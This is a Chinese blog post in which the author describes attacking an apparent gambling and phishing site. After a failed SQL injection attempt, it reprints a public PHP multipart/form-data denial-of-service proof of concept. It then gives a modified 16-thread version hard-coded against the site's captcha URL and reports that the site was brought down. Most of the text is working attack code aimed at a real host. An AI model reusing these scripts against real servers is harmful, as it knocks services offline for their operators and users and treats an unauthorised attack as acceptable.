记一次搞某赌博钓鱼站经历

最近貌似有某盗号集团猖獗,班上好几个同学被盗了号,于是……

QQ20160607-0

班上有同学抱着好(zuo)奇(si)的心理,进群看了看,以下是聊(si)天(bi)记录:
QQ20160607-1
QQ20160607-2
QQ20160607-3

QQ20160607-4

一开始,我只想做个安静的美男子,直到这条消息出现了:
QQ20160607-5

向勇士要来了网址,打开一看,发现是一个“环球国际”网站的注册页面。其实一开始,我是想用SQL注入的:查看HTML,发现对应的输入表单绑定了onkeyup事件,会自动替换掉所有的;和’符号,于是把这段事件删掉,再尝试输入特殊符号,仍然无果。甚至当我删光网页上的js和css后仍无法输入(并不知道为什么)。只能放弃。

不过,用开发工具看了看响应头,倒是发现了有趣的东西:

11F2BA3C-5FAD-4351-8B89-D99499B7AF06

PHP 5.3.29!这个版本存在已有公开PoC的严重漏洞。于是想起了以前在乌云知识库上一位大神的脚本:

'''
Author: Shusheng Liu,The Department of Security Cloud, Baidu
email: liusscs@163.com
'''
import sys
import urllib,urllib2
import datetime
from optparse import OptionParser

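def http_proxy(proxy_url):
    """Route all later urllib2 requests in this process through *proxy_url*.

    Builds an opener with a single ``ProxyHandler`` and installs it as the
    process-wide default via ``urllib2.install_opener``, so every subsequent
    ``urllib2.urlopen`` call goes through the proxy. Only the ``http`` scheme
    is mapped; requests for other schemes are not proxied.

    Args:
        proxy_url: proxy address in the form ``ProxyHandler`` accepts, e.g.
            the ``"http://127.0.0.1:8089"`` value used by the commented-out
            call in ``main``.
    """
    proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
    # The original also built an empty ProxyHandler({}) that was never used;
    # only the real handler is installed.
    urllib2.install_opener(urllib2.build_opener(proxy_handler))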
#end http_proxy

def check_php_multipartform_dos(url,post_body,headers):
    """Time one POST of *post_body* to *url* and classify it by elapsed seconds.

    Returns a two-element list ``[result, usetime]``. ``usetime`` is the
    ``seconds`` field of the elapsed ``timedelta`` (whole seconds only, so
    sub-second precision is discarded). ``result`` is a message chosen
    purely by that delay:

    * ``usetime > 5``      -> ``"<url> is vulnerable"``
    * ``3 < usetime <= 5`` -> ``"need to check normal respond time"``

    NOTE(review): when ``usetime <= 3`` no branch assigns ``result``, so the
    final ``return`` raises ``UnboundLocalError`` instead of reporting a
    negative result; a fast reply is the common case, so callers should
    expect that exception. Network latency and ordinary server load also
    inflate ``usetime``, which is why the middle band exists: the timing
    threshold alone cannot distinguish the vulnerability from a slow host.
    """
    req = urllib2.Request(url)
    # Copy every supplied header onto the request unchanged.
    for key in headers.keys():
        req.add_header(key,headers[key])
    starttime = datetime.datetime.now();
    # Blocking POST. A 4xx/5xx reply raises urllib2.HTTPError here and is
    # not caught, so an error status also ends the check with an exception.
    fd = urllib2.urlopen(req,post_body)
    # The body is read only so the timing covers the whole response; its
    # content is never inspected and the response object is never closed.
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime=(endtime - starttime).seconds
    if(usetime > 5):
        result = url+" is vulnerable";
    else:
        if(usetime > 3):
            result = "need to check normal respond time"
    return [result,usetime]
#end

def main():
    """Command-line entry point: build one oversized multipart body and time a POST of it.

    The only option is ``-t/--target URL``. Without it the function returns
    silently (no usage message, no non-zero exit). With it, a single
    multipart/form-data ``file`` part padded with ``Num`` (350000) lines
    consisting of one ``a`` is POSTed to the target through
    ``check_php_multipartform_dos``, and the resulting message and elapsed
    whole seconds are printed. The proxy call is left commented out.
    """
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                      dest="target",
                      default=False,
                      type="string",
                      help="test target")
    (options, args) = parser.parse_args()
    if(options.target):
        target = options.target
    else:
        # No target given: exit quietly rather than print usage.
        return;

    Num=350000
    # Browser-like headers; the boundary in Content-Type must match the one
    # written into the body below.
    headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
             'Accept-Encoding':'gzip, deflate',
             'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload=""
    # Padding placed between the part's Content-Disposition line and its
    # Content-Type header; Num lines of it make the single part large.
    for i in range(0,Num):
        payload = payload + "a\n"
    body = body + payload;
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    # respond is [message, whole_seconds]; see check_php_multipartform_dos
    # for the thresholds (and for the UnboundLocalError on fast replies).
    respond=check_php_multipartform_dos(target,body,headers)
    print "Result : "
    print respond[0]
    print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":
    # Run the check only when executed as a script, not on import.
    main()

尝试直接使用,效果不明显(虽然这个脚本跑了150s才结束),于是稍作修改,加入多线程:

'''
Author: Shusheng Liu,The Department of Security Cloud, Baidu
email: liusscs@163.com
'''

import urllib, urllib2
import datetime
import time
from optparse import OptionParser
import threading

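def http_proxy(proxy_url):
    """Route all later urllib2 requests in this process through *proxy_url*.

    Builds an opener with a single ``ProxyHandler`` and installs it as the
    process-wide default via ``urllib2.install_opener``, so every subsequent
    ``urllib2.urlopen`` call goes through the proxy. Only the ``http`` scheme
    is mapped; requests for other schemes are not proxied.

    Args:
        proxy_url: proxy address in the form ``ProxyHandler`` accepts, e.g.
            the ``"http://127.0.0.1:8089"`` value used by the commented-out
            call in ``main``.
    """
    proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
    # The original also built an empty ProxyHandler({}) that was never used;
    # only the real handler is installed.
    urllib2.install_opener(urllib2.build_opener(proxy_handler))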

# end http_proxy

def check_php_multipartform_dos(url, post_body, headers):
    """Time one POST of *post_body* to *url* and classify it by elapsed seconds.

    Returns a two-element list ``[result, usetime]``. ``usetime`` is the
    ``seconds`` field of the elapsed ``timedelta`` (whole seconds only, so
    sub-second precision is discarded). ``result`` is a message chosen
    purely by that delay:

    * ``usetime > 5``      -> ``"<url> is vulnerable"``
    * ``3 < usetime <= 5`` -> ``"need to check normal respond time"``

    NOTE(review): when ``usetime <= 3`` no branch assigns ``result``, so the
    final ``return`` raises ``UnboundLocalError`` instead of reporting a
    negative result. When several threads call this at once, their own
    load on the server also inflates ``usetime``, so the "vulnerable"
    verdict cannot be separated from plain overload by this timing alone.
    """
    req = urllib2.Request(url)
    # Copy every supplied header onto the request unchanged.
    for key in headers.keys():
        req.add_header(key, headers[key])
    starttime = datetime.datetime.now();
    # Blocking POST. A 4xx/5xx reply raises urllib2.HTTPError here and is
    # not caught, so an error status also ends the check with an exception.
    fd = urllib2.urlopen(req, post_body)
    # The body is read only so the timing covers the whole response; its
    # content is never inspected and the response object is never closed.
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime = (endtime - starttime).seconds
    if (usetime > 5):
        result = url + " is vulnerable";
    else:
        if (usetime > 3):
            result = "need to check normal respond time"
    return [result, usetime]

# end

def main():
    """Build one oversized multipart body and time a POST of it to the hard-coded URL.

    There is no command-line option here: the target is fixed inside the
    function as the site's ``/index.php/user/vcode/<unix-time>`` path, with
    the current ``int(time.time())`` substituted, so calls made in different
    seconds request different URLs. The body is a single multipart/form-data
    ``file`` part padded with ``Num`` (350000) repetitions of two lines
    (``a`` then ``b``); the message and elapsed whole seconds returned by
    ``check_php_multipartform_dos`` are printed.

    This function is the body of every ``mythread`` below, so when the
    module is run the request is issued from each started thread at once
    and the print lines of different threads may interleave.
    """
    # http_proxy("http://127.0.0.1:8089")

    Num = 350000
    # Browser-like headers; the boundary in Content-Type must match the one
    # written into the body below.
    headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
               'Accept-Encoding': 'gzip, deflate',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload = ""
    # Padding placed between the part's Content-Disposition line and its
    # Content-Type header; Num repetitions of it make the single part large.
    for i in range(0, Num):
        payload = payload + "a\nb\n"
    body = body + payload;
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    # Target URL is built fresh on every call; respond is [message, whole_seconds].
    respond = check_php_multipartform_dos('http://vip1.huanqiugj.com/index.php/user/vcode/{time}'.format(time=int(time.time())), body, headers)
    print "Result : "
    print respond[0]
    print "Respond time : " + str(respond[1]) + " seconds";

class mythread(threading.Thread):
    """Thread whose whole body is one call to the module-level ``main``.

    Each started instance builds its own padded body and issues its own
    timed POST. An uncaught exception inside ``main`` (for example the
    ``UnboundLocalError`` that a fast reply triggers in
    ``check_php_multipartform_dos``) prints a traceback and ends only that
    thread; the others keep running.
    """
    def __init__(self):
        # Plain Thread with no name or target; the work is in run().
        threading.Thread.__init__(self)
    def run(self):
        main()
if __name__ == "__main__":
    # Create 16 worker threads first, then start them all. The main thread
    # never joins them; the workers are non-daemon, so the interpreter stays
    # alive until each one's main() call has returned or raised.
    L=[]
    for i in range(16):
        L.append(mythread())
    for i in L:
        i.start()

请求目标为验证码生成页面,应该效果会比请求注册页面更好。

开八线程时目标网站已经需要数十s才能打开,16线程彻底搞死。

END.